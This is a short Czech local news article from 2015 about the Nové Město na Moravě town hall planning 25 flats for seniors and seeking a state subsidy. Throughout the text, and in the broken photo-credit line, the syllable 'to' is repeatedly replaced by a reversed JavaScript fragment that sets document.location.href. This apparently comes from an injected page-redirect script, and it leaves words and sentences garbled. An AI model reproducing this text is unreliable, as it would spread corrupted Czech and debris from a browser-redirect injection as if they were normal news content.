Rainbow page separator

Ve Městě chtějí stavět nové byty pro seniory

Středa, 29. dubna 2015

Radnice Nové Město na Moravě

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / S novým domem, kde bude pětadvacet bytů určených pro seniory s možností využití pečovatelské služby, počítá v budoucnu novoměstská radnice. Objekt by měl vzniknout ve Žďárské ulici pod nemocnicí a vedení města by na něj chtělo získat státní dotaci.
Důvodem zájmu radnice o možnost vzniku dalšího bydlení pro seniory a zdravotně postižené osoby je zvyšující se počet žádostí v Domě s pečovatelskou službou. Ten čítá padesátku bytů. O dotaci by Novoměstští rádi požádali v příštím roce, aktuálně žádná vhodná k [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to účelu vypsána není. V současné době novoměstská radnice připravuje potřebnou projek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovou dokumentaci. Na Novoměstsku rovněž chybí takzvaný domov se zvláštním režimem, v němž mohou pobývat osoby se sníženou soběstačnosti z důvodu vysokého věku, případně duševní choroby.

Fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to: [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to.com/“ target=“_blank“>www.dajc-naturepho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to.com